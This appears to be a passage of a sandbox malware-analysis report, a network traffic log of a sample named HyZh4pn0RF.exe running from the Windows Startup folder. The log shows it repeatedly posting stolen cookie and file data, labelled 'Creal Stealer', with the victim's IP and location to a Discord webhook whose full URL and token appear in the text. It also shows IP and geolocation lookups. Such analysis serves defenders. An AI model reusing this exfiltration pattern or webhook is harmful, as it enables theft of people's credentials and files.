                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bfo6%2BpLH0xBtM%2B3RP9OD0OaZKkyoBbtUyrkI4KEgiIhXoy21wwjPyPhaip6vsf2%2FbnRDSgw5JnzTlgkNCUGCeebPqP%2B8rICPNLGNP4t0M3mjl2S4bP9crLF9nFcv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3f60d4367cec11efb6bfce5421a2957bcfeeea4512cfa12521770092496e33566f10872398fd18bed539d53360ec53db; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=c387d6a5af5e9ff58e66aa3262890441f071e70d-1727453958; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 43 69 75 76 45 38 6c 69 76 48 76 4e 4e 63 57 51 30 66 5f 30 69 75 74 34 6f 4f 74 59 41 72 48 4c 71 61 6f 4e 78 78 4b 78 49 43 6f 2d 31 37 32 37 34 35 33 39 35 38 39 33 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 38 61 63 61 39 31 38 63 64 36 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=CiuvE8livHvNNcWQ0f_0iut4oOtYArHLqaoNxxKxICo-1727453958936-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd08aca918cd6-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:18 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                68192.168.2.849783162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:19 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:19 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:19 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:19 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3fcb19e07cec11efbb0972506fccbbd5; Expires=Wed, 26-Sep-2029 16:19:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453961
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CFlnKR2nBpAXtCrxQtK%2Bpf%2BMHsNlIZlHe8uyy43hvLsC0VLaCiG4p2D0NrlhpcR14RJ3XVwJMNGbijJvkbVG6mlKfKgrA4U1MmP968D%2BQdCRiI7os6sfD1hsrc21"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3fcb19e07cec11efbb0972506fccbbd52046978512bc3a3ff9e052d1d30ab1a6c95dea4efdeac673fad93551797fbe6d; Expires=Wed, 26-Sep-2029 16:19:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=e4739a2ca980cf72b6c40b39dd5676ede23582a9-1727453959; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:19 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 72 4b 6e 4d 5f 38 6a 47 6a 48 52 43 54 4d 62 79 61 61 2e 44 4e 52 2e 4e 63 48 30 65 55 5f 76 4a 46 70 78 6a 49 71 4b 31 6d 49 2d 31 37 32 37 34 35 33 39 35 39 36 33 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 38 66 33 66 65 38 38 63 61 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=QrKnM_8jGjHRCTMbyaa.DNR.NcH0eU_vJFpxjIqK1mI-1727453959633-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd08f3fe88ca5-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:19 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                69192.168.2.849784162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:20 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:20 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:20 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:20 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=402fc8fe7cec11ef81c93a45c6a02b6a; Expires=Wed, 26-Sep-2029 16:19:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453961
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqMEy1frYd0ukYO9EtMVw%2BsPqaLdhpbqcgjRQndVDBMlD5eejQ2PhVrmRBRAH1E%2FWJ1VCEzU2ok4RMCNbZEHYweiG%2BysPNKEOXoHnohl1bqdiF9hATknQzClundF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=402fc8fe7cec11ef81c93a45c6a02b6af1be99b918c971e3318b7f7702684800cab2e17a51b10f7d1029ef53d3341c53; Expires=Wed, 26-Sep-2029 16:19:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=2d2e75bff7344a90e4a667f73dabe89efa23a2ba-1727453960; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:20 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 6d 58 33 44 56 33 51 44 62 42 65 35 34 7a 73 58 4d 48 2e 38 59 45 44 58 53 38 33 51 55 63 56 78 52 64 56 4b 31 78 34 35 54 30 2d 31 37 32 37 34 35 33 39 36 30 32 39 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 39 33 36 64 33 33 33 33 34 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=QmX3DV3QDbBe54zsXMH.8YEDXS83QUcVxRdVK1x45T0-1727453960291-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0936d33334e-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:20 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                70192.168.2.849785172.67.74.1524435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:21 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:21 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:21 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8c9cd0990aac0f3a-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:21 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                71192.168.2.849786159.89.102.2534435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:22 UTC139OUTGET /jsonp/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: geolocation-db.com
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:22 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:22 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:22 UTC171INData Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                72192.168.2.849787162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:22 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:22 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:22 UTC1339INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:22 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=41bc0bf67cec11efb1a5a6d8f199100f; Expires=Wed, 26-Sep-2029 16:19:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453964
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QK2%2FavJ7q0EEy1lDOKbuKgVuPHMluEIyKyqY7p2wcv7ZaG5caYZUHanDnRZ2g2gT5ut6B%2FSf2hM87wzRYHvSGsQ8%2BV5o%2FFwjz4u11digsZVRVxfpM%2Fbkqew2h8iY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=41bc0bf67cec11efb1a5a6d8f199100ffc8ec33858e1370b306ad38fdc6a81859e5d41b9cf3a6a7cac094cab1042ca91; Expires=Wed, 26-Sep-2029 16:19:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=f8d03ec6a155ae33fbe22a42cbc4732fd9e61759-1727453962; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:22 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6d 4a 32 53 67 50 47 6b 43 4e 53 4a 58 75 79 73 36 58 6c 52 61 77 74 6a 72 2e 50 43 6e 78 38 71 50 43 56 32 52 7a 51 50 4f 68 77 2d 31 37 32 37 34 35 33 39 36 32 38 38 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 61 33 39 63 62 39 34 33 30 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=mJ2SgPGkCNSJXuys6XlRawtjr.PCnx8qPCV2RzQPOhw-1727453962887-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0a39cb9430a-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:22 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                73192.168.2.849788162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:23 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:23 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:23 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:23 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
